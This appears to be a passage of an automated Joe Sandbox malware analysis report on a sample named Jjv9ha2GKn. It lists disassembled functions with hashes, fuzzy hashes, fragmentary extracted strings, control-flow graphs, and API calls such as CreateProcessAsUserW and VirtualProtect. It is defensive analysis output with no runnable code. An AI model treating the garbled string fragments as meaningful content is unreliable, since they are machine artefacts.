                                                                                                            • Instruction ID: 84b7fd25640409d7e50f1b1f601b543bbcdc5c6abcc56af5ded0498640756f29
                                                                                                            • Opcode Fuzzy Hash: 24ec86ec18a05d969e088cab8835882675ddc57c20f57cfbb6e031cfa7cb0990
                                                                                                            • Instruction Fuzzy Hash: EAA104B5E152098FCB08CFA9D9906DEFBF2FF89310F24902AD415BB295DB3499468F50
                                                                                                            Function 0719BB70 Relevance: 2.7, Strings: 2, Instructions: 207COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Te]q$Te]q
                                                                                                            • API String ID: 0-3320153681
                                                                                                            • Opcode ID: b40cf78007ec7d9843ebc01ecb030253f514d81d09871ee97526cdc2e0fabad6
                                                                                                            • Instruction ID: 8cb87ed65c3e8c14ad7ed829a9f91d0179dde97913aaba0dd7088a89d42390ce
                                                                                                            • Opcode Fuzzy Hash: b40cf78007ec7d9843ebc01ecb030253f514d81d09871ee97526cdc2e0fabad6
                                                                                                            • Instruction Fuzzy Hash: CB91C4B4E142098FDB08CFAAD984ADEFBB2FF89300F14942AD415BB254DB349946CF54
                                                                                                            Function 075D3780 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 6f$$]q
                                                                                                            • API String ID: 0-403443862
                                                                                                            • Opcode ID: a2b4ef290522b567844e3905234b10ac1d6a9693c51e46cb6353e04265816ed7
                                                                                                            • Instruction ID: 781007e88dff8253f80bdfa9269e4bd8b0e4944aab90993512f579258e3c656c
                                                                                                            • Opcode Fuzzy Hash: a2b4ef290522b567844e3905234b10ac1d6a9693c51e46cb6353e04265816ed7
                                                                                                            • Instruction Fuzzy Hash: 1071F4B4E01209DFDB14CFA9D5855DEBBB2FF89300F20856AE406A7355DB345A81CF91
                                                                                                            Function 075DACA0 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 075DAE0B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcessUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 2217836671-0
                                                                                                            • Opcode ID: e7c2375719449b84145836e795bd97aa0edd431a30bac2cb30d3ff34d6ad6d72
                                                                                                            • Instruction ID: 15e4060a9e6956f6ec1dbca70292b633a2539e3dd3c8c42ac6f60bbe23885fe9
                                                                                                            • Opcode Fuzzy Hash: e7c2375719449b84145836e795bd97aa0edd431a30bac2cb30d3ff34d6ad6d72
                                                                                                            • Instruction Fuzzy Hash: 3651F6B190022ADFDB25CF59C840BDEBBB5BF48314F0485AAE818B7250DB719E85CF90
                                                                                                            Function 0719AF50 Relevance: 1.6, APIs: 1, Instructions: 114memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0719AF13
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: 4c4e2bc4112b91bf17a670ef3acb3000fba7ed24605e6311b6c2a47eb303f7f3
                                                                                                            • Instruction ID: 0df74ed374e8139aac5b4dac10074eeff958972c595ec12e85d9741ac1790936
                                                                                                            • Opcode Fuzzy Hash: 4c4e2bc4112b91bf17a670ef3acb3000fba7ed24605e6311b6c2a47eb303f7f3
                                                                                                            • Instruction Fuzzy Hash: 2E413DB1E042158FEB18DFAAD84079EBBF2AFC9210F04C0AAD40CA7251EB345985CF61
                                                                                                            Function 0719DC2B Relevance: 1.6, Strings: 1, Instructions: 300COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: kQD
                                                                                                            • API String ID: 0-3066535408
                                                                                                            • Opcode ID: 25986cd9ddd9c02412ab9dc350e7a2ba2278260b0a0968b99f43eaa1500457e8
                                                                                                            • Instruction ID: 58fd82007b7eaca5249cfb4812cfb7e205ad177e2e1efd34df814bf33df7e3db
                                                                                                            • Opcode Fuzzy Hash: 25986cd9ddd9c02412ab9dc350e7a2ba2278260b0a0968b99f43eaa1500457e8
                                                                                                            • Instruction Fuzzy Hash: AFC14BB4E1120ADFCB04CFA9D4818AEFBB2FF49301B55C569D451A7295D734EA42CF90
                                                                                                            Function 0719DC60 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: kQD
                                                                                                            • API String ID: 0-3066535408
                                                                                                            • Opcode ID: 5f1af6b665d78f5f5e0ca6e08ce3e8f2647cb5daa71e1df5830b1c65cc54d724
                                                                                                            • Instruction ID: cb3ae0693e24d9a41196bd056c69f88d06a002055004eebf6809ae69de617e12
                                                                                                            • Opcode Fuzzy Hash: 5f1af6b665d78f5f5e0ca6e08ce3e8f2647cb5daa71e1df5830b1c65cc54d724
                                                                                                            • Instruction Fuzzy Hash: 3DC115B4E10209DFCB08CFA9D4848AEFBB2FF89301B55C569D415AB254D738EA42CF90
                                                                                                            Function 0719C3E9 Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: >NG
                                                                                                            • API String ID: 0-1926143806
                                                                                                            • Opcode ID: 4b506ba944becb5ecd6773104638f147e7b731a2f19bdf3ded2a80836ecd9c68
                                                                                                            • Instruction ID: f6f3c8d0273d0a3b22b7cc7d7e28785cd528a9f6e92a53576f05aeccf927e144
                                                                                                            • Opcode Fuzzy Hash: 4b506ba944becb5ecd6773104638f147e7b731a2f19bdf3ded2a80836ecd9c68
                                                                                                            • Instruction Fuzzy Hash: 50615AB0E152198FCB08CFA9C8415EEFBF2EF89301F14D16AD459A7295D7349A42CBA4
                                                                                                            Function 07195E78 Relevance: 1.4, Instructions: 1392COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fd80033f06ed6726e835ed4f5efd32927c109c357ef75799add6501ec18a5aca
                                                                                                            • Instruction ID: 41c7b8e46cd08cfc28e6614b6faf598ffdac7210022f5df948c329ed98dbea7b
                                                                                                            • Opcode Fuzzy Hash: fd80033f06ed6726e835ed4f5efd32927c109c357ef75799add6501ec18a5aca
                                                                                                            • Instruction Fuzzy Hash: 35C29F70A142289FC754BF78D9847ADBBB2BF88304F8085A9D44DA7384DF385D86CB56
                                                                                                            Function 07199EB8 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: <
                                                                                                            • API String ID: 0-4251816714
                                                                                                            • Opcode ID: 1494fb5d6aaee227eabe5d7e13afda9df94c0ff3894bcb1b4a6d79f2253fbbd3
                                                                                                            • Instruction ID: 54be1feb694b7c9d0da8d3032496e29c861e057ab2d9f468be91e194c857c88e
                                                                                                            • Opcode Fuzzy Hash: 1494fb5d6aaee227eabe5d7e13afda9df94c0ff3894bcb1b4a6d79f2253fbbd3
                                                                                                            • Instruction Fuzzy Hash: 9751A7B1E016588FDB59CFAAC9446DDBBF2AFC9301F14C0AAD409AB264DB345A85CF40
                                                                                                            Function 07AF2760 Relevance: .6, Instructions: 596COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ea8ebb012cb3b9ccd6449c87f1e740131ac14097d1ba74cfd4a9a44b8f690c33
                                                                                                            • Instruction ID: 9fd9069546a00df9bcd56d94a778e2b5c742a58afcf6e2078006242dc172b23b
                                                                                                            • Opcode Fuzzy Hash: ea8ebb012cb3b9ccd6449c87f1e740131ac14097d1ba74cfd4a9a44b8f690c33
                                                                                                            • Instruction Fuzzy Hash: 7B527B70A00305CFCB14DF68C944B99B7B2FF89314F2186A9D5586F3A2DB71A986CF81
                                                                                                            Function 07AF2750 Relevance: .6, Instructions: 584COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2762051972.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7af0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 813e69bcb2ea5e272c5cdf1470121ff813d0cba109fd7e2f766b4f54bc6bb151
                                                                                                            • Instruction ID: 7b882fa25139b14f238774df7002532e81ce5eea9812be0ca247e6101b997269
                                                                                                            • Opcode Fuzzy Hash: 813e69bcb2ea5e272c5cdf1470121ff813d0cba109fd7e2f766b4f54bc6bb151
                                                                                                            • Instruction Fuzzy Hash: 8D527B70A00305CFCB14DF68C944B99B7B2FF89314F2586A9D5586F3A2DB71A986CF81
                                                                                                            Function 075D5F00 Relevance: .3, Instructions: 343COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 86c77fbe759d183c6ad3484dcc7e7b4a8f162665657f0718bb062c5e95c4b7f0
                                                                                                            • Instruction ID: d9ff9eb1b02a37d9c7eb89471c2913f34c2fdd7518d6646eda7405ec0e9b4574
                                                                                                            • Opcode Fuzzy Hash: 86c77fbe759d183c6ad3484dcc7e7b4a8f162665657f0718bb062c5e95c4b7f0
                                                                                                            • Instruction Fuzzy Hash: E3F12BB4A1566A8FCB64CF69C9447DDBBB6BF88300F1085E6D40EAB254E7349E81CF40
                                                                                                            Function 075D524F Relevance: .2, Instructions: 179COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e77f1a863cbe524cfdd78dae74213a898b5e2d6e46bf9d741e800f9ef591e9d4
                                                                                                            • Instruction ID: 6510a80bb81c0fc09aa0f6d574dbfc7d42f3e9f6dd631021a9691b147385c539
                                                                                                            • Opcode Fuzzy Hash: e77f1a863cbe524cfdd78dae74213a898b5e2d6e46bf9d741e800f9ef591e9d4
                                                                                                            • Instruction Fuzzy Hash: FE717DB0D11209DFDB24CFA8C8446EEBBB2FF89301F14892AD412A7254E7755A16CF91
                                                                                                            Function 075D0F95 Relevance: .2, Instructions: 172COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b1bdd4a2a3e1f08d5f6648846c5d0ad9638a9d8df1eb965efc8f33fd0a0fba15
                                                                                                            • Instruction ID: 1624d2ef7784ed4e4ec34abc0fa7fd8dc5124c19ea7e62937f8a03e50a20073a
                                                                                                            • Opcode Fuzzy Hash: b1bdd4a2a3e1f08d5f6648846c5d0ad9638a9d8df1eb965efc8f33fd0a0fba15
                                                                                                            • Instruction Fuzzy Hash: 9261EB72E056598BDB28CF6B9C452D9FBF3EFC9311F14C1AAC44CAA615DB310A868F41
                                                                                                            Function 075D5260 Relevance: .2, Instructions: 159COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 55c957b199d0c0ee66e24b11fc2420b40288fb3bf34cccee7153de73d65064ef
                                                                                                            • Instruction ID: 0fb002d149efde67cffcac02910bf8a7aac3a1593cba3206902def11744d67de
                                                                                                            • Opcode Fuzzy Hash: 55c957b199d0c0ee66e24b11fc2420b40288fb3bf34cccee7153de73d65064ef
                                                                                                            • Instruction Fuzzy Hash: BA6146B0D11219DFDB18CFE8D5456EEBBB1FF49302F10882AD412A7254E7745A16CF91
                                                                                                            Function 075D54FB Relevance: .2, Instructions: 152COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e8afbbd2f8d5663b9f42f4c738d46468112543292544854aeb8045fc6a537d40
                                                                                                            • Instruction ID: 31de4924f824169c2db4c80d990dbee4ff81481bef0c6488cb3422c8cb7d2d42
                                                                                                            • Opcode Fuzzy Hash: e8afbbd2f8d5663b9f42f4c738d46468112543292544854aeb8045fc6a537d40
                                                                                                            • Instruction Fuzzy Hash: C9517CB0D11209DFDB14CFA8D4486EEBBB1FF49301F10996AD412A7354EB799A12CF91
                                                                                                            Function 0719CDB0 Relevance: .1, Instructions: 125COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761733644.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7190000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b0ce0fa28de56c3546c8a189d511d8896c84045e26e78d35c3d67f8ea2c807be
                                                                                                            • Instruction ID: 1eeb13fc58e4a58cacbb12d01d35ad993ab40b7dce871503d2ead3f2ce77703a
                                                                                                            • Opcode Fuzzy Hash: b0ce0fa28de56c3546c8a189d511d8896c84045e26e78d35c3d67f8ea2c807be
                                                                                                            • Instruction Fuzzy Hash: 2B5108B4E112188FDB58CF66D9846DEBBB2FF89310F1480A9D40967255DB346A85CF90
                                                                                                            Function 075D1010 Relevance: .1, Instructions: 114COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7c453ccf855915cd948c7f527e72f48230358ea6d60c12441af4d9c3a28bbf02
                                                                                                            • Instruction ID: 86bc14fcdf53e11910cd83ae3641f9a12bb882643b102a3046712306f1311eda
                                                                                                            • Opcode Fuzzy Hash: 7c453ccf855915cd948c7f527e72f48230358ea6d60c12441af4d9c3a28bbf02
                                                                                                            • Instruction Fuzzy Hash: 20514AB1E016188BEB68CF6B894579DFAF7AFC9301F14C1BA850CA6214EB341A858F51
                                                                                                            Function 075D0460 Relevance: .1, Instructions: 65COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761948083.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_75d0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e694a210fba8a16b91f83f35277c24084e17aad465a790526a81747a3f953584
                                                                                                            • Instruction ID: 8d92f150290ba4578b9a13ff19d4763a93ee74d77a12391a887fa91922777813
                                                                                                            • Opcode Fuzzy Hash: e694a210fba8a16b91f83f35277c24084e17aad465a790526a81747a3f953584
                                                                                                            • Instruction Fuzzy Hash: 8621BCB1E056188BEB58CF6BDC406DEFBF7AFC8200F14C1BAD508A6264DB345A568F51
                                                                                                            Function 026F5200 Relevance: 6.6, Strings: 5, Instructions: 342COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1351 26f5200-26f5236 1352 26f5258-26f52eb 1351->1352 1364 26f570d-26f578f 1352->1364 1365 26f52f1-26f5301 1352->1365 1445 26f5791 call 26f534d 1364->1445 1446 26f5791 call 26f554c 1364->1446 1447 26f5791 call 26f531a 1364->1447 1448 26f5791 call 26f55a9 1364->1448 1449 26f5791 call 26f5515 1364->1449 1450 26f5791 call 26f5200 1364->1450 1443 26f5303 call 26f636f 1365->1443 1444 26f5303 call 26f63c0 1365->1444 1367 26f5309-26f5311 1368 26f5238-26f523b 1367->1368 1370 26f523d 1368->1370 1371 26f5244-26f5256 1368->1371 1369 26f5797-26f57a3 1372 26f57cc-26f5807 1369->1372 1373 26f57a5-26f57b0 1369->1373 1370->1352 1370->1371 1374 26f55cd-26f55d1 1370->1374 1375 26f55b6-26f55ba 1370->1375 1376 26f54a0-26f54b7 1370->1376 1371->1368 1392 26f5829-26f583c 1372->1392 1373->1372 1379 26f57b2-26f57c2 1373->1379 1377 26f55d3-26f55dc 1374->1377 1378 26f55f2 1374->1378 1382 26f55bc 1375->1382 1383 26f55c6-26f55cb 1375->1383 1396 26f54b9 1376->1396 1397 26f54c3-26f54c8 1376->1397 1385 26f55de-26f55e1 1377->1385 1386 26f55e3-26f55e6 1377->1386 1389 26f55f5-26f5611 1378->1389 1379->1372 1387 26f57c4-26f57cb 1379->1387 1384 26f55c1 1382->1384 1383->1384 1384->1368 1390 26f55f0 1385->1390 1386->1390 1398 26f5617-26f561c 1389->1398 1390->1389 1401 26f583f-26f5844 1392->1401 1400 26f54be 1396->1400 1397->1400 1398->1368 1400->1368 1402 26f5809-26f580c 1401->1402 1403 26f580e 1402->1403 1404 26f5815-26f5827 1402->1404 1403->1392 1403->1401 1403->1404 1405 26f586c-26f5871 1403->1405 1406 26f588a-26f588f 1403->1406 1407 26f596a-26f596f 1403->1407 1408 26f5846-26f5849 1403->1408 1409 26f58c1-26f58d4 call 26f0ff0 1403->1409 1410 26f5960-26f5965 1403->1410 1411 26f595b 1403->1411 1412 26f5859-26f585c 1403->1412 1413 26f58b7-26f58bc 1403->1413 1414 26f5894-26f58b2 1403->1414 1415 26f5974-26f597d 1403->1415 1416 26f5873-26f587d 1403->1416 1404->1402 1405->1402 1406->1402 1407->1402 1420 26f584b 1408->1420 1421 26f5852-26f5857 1408->1421 1430 26f58d6-26f58dc 1409->1430 1431 26f58f2 1409->1431 1410->1402 1411->1410 1422 26f585e 1412->1422 1423 26f5865-26f586a 1412->1423 1413->1402 1414->1402 1424 26f587f 1416->1424 1425 26f5886-26f5888 1416->1425 1427 26f5850 1420->1427 1421->1427 1429 26f5863 1422->1429 1423->1429 1426 26f5884 1424->1426 1425->1426 1426->1402 1427->1402 1429->1402 1432 26f58de-26f58e0 1430->1432 1433 26f58e2-26f58ee 1430->1433 1434 26f58f4-26f594a 1431->1434 1435 26f58f0 1432->1435 1433->1435 1442 26f5951-26f5956 1434->1442 1435->1434 1442->1402 1443->1367 1444->1367 1445->1369 1446->1369 1447->1369 1448->1369 1449->1369 1450->1369
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 8aq$Te]q$Te]q$$]q$$]q
                                                                                                            • API String ID: 0-4290747453
                                                                                                            • Opcode ID: a48fa1ff83deabddbe3d3d7a3fbebebde5aa6ede4164cf2cf63c38c34cda744d
                                                                                                            • Instruction ID: 17ff0ac0e6f38e141b113faa55cb970e14f77494e3529846aeecdf07f569e038
                                                                                                            • Opcode Fuzzy Hash: a48fa1ff83deabddbe3d3d7a3fbebebde5aa6ede4164cf2cf63c38c34cda744d
                                                                                                            • Instruction Fuzzy Hash: 48C13430A05250DFDF498BB8D9657AEBBB1EF86300F58806AE9479B392CB258C43C751
                                                                                                            Function 026F89E8 Relevance: 5.3, Strings: 4, Instructions: 271COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (o]q$(o]q$(o]q$(o]q
                                                                                                            • API String ID: 0-1261621458
                                                                                                            • Opcode ID: 931e9396954c7f7ffdd91a5162338fac1efae06e647a016e77702e923d55d3aa
                                                                                                            • Instruction ID: 73732f1895f9e54c81606c93ef81de71afc9a2eedfcca06386004f5cc8001d4e
                                                                                                            • Opcode Fuzzy Hash: 931e9396954c7f7ffdd91a5162338fac1efae06e647a016e77702e923d55d3aa
                                                                                                            • Instruction Fuzzy Hash: AEC13530A012099FCF94CF69C984A9EBBF2FF88314F158599EA59AB361D730ED41CB50
                                                                                                            Function 026FA528 Relevance: 4.0, Strings: 3, Instructions: 226COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 7478 26fa528-26fa535 7479 26fa537-26fa53c 7478->7479 7480 26fa541-26fa55f 7478->7480 7481 26fa626-26fa62b 7479->7481 7485 26fa5d6-26fa5e2 7480->7485 7486 26fa561-26fa56b 7480->7486 7489 26fa5f9-26fa605 7485->7489 7490 26fa5e4-26fa5f0 7485->7490 7486->7485 7491 26fa56d-26fa579 7486->7491 7498 26fa61c-26fa61e 7489->7498 7499 26fa607-26fa613 7489->7499 7490->7489 7497 26fa5f2-26fa5f7 7490->7497 7495 26fa59e-26fa5a1 7491->7495 7496 26fa57b-26fa586 7491->7496 7500 26fa5b8-26fa5c4 7495->7500 7501 26fa5a3-26fa5af 7495->7501 7496->7495 7506 26fa588-26fa592 7496->7506 7497->7481 7498->7481 7546 26fa620 call 7197e98 7498->7546 7547 26fa620 call 7197ea8 7498->7547 7499->7498 7508 26fa615-26fa61a 7499->7508 7504 26fa62c-26fa688 7500->7504 7505 26fa5c6-26fa5cd 7500->7505 7501->7500 7511 26fa5b1-26fa5b6 7501->7511 7516 26fa69b-26fa6a6 7504->7516 7517 26fa68a-26fa695 7504->7517 7505->7504 7509 26fa5cf-26fa5d4 7505->7509 7506->7495 7514 26fa594-26fa599 7506->7514 7508->7481 7509->7481 7511->7481 7514->7481 7521 26fa6ac-26fa709 7516->7521 7522 26fa777-26fa7b3 7516->7522 7517->7516 7520 26fa71e-26fa770 7517->7520 7520->7522 7529 26fa712-26fa71b 7521->7529 7532 26fa7ba-26fa7bc 7522->7532 7533 26fa7b5 call 26f9538 7522->7533 7534 26fa7be-26fa7cb 7532->7534 7535 26fa7cd-26fa7db 7532->7535 7533->7532 7542 26fa7eb-26fa7ee 7534->7542 7540 26fa7dd-26fa7e7 7535->7540 7541 26fa7e9 7535->7541 7540->7542 7541->7542 7546->7481 7547->7481
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2751306084.00000000026F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026F0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_26f0000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (o]q$$]q$$]q
                                                                                                            • API String ID: 0-989248301
                                                                                                            • Opcode ID: 3bbee253ef77bd1454cc916c9a1aa7f41f1db7b9de9d99f14a2046ad88656d81
                                                                                                            • Instruction ID: 5c9278007640325ce9b40bd65ffc4eaf3aa6aba937e855aed65ab814ecd571c5
                                                                                                            • Opcode Fuzzy Hash: 3bbee253ef77bd1454cc916c9a1aa7f41f1db7b9de9d99f14a2046ad88656d81
                                                                                                            • Instruction Fuzzy Hash: 7671B1357002048FCF599FA8D994A6E7BB6FB88710B24446AE60ADB391DF34DC42C7A1
                                                                                                            Function 07150A1C Relevance: 3.9, Strings: 3, Instructions: 118COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2761625176.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7150000_Jjv9ha2GKn.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: @$TJbq$Te]q
                                                                                                            • API String ID: 0-2800237591
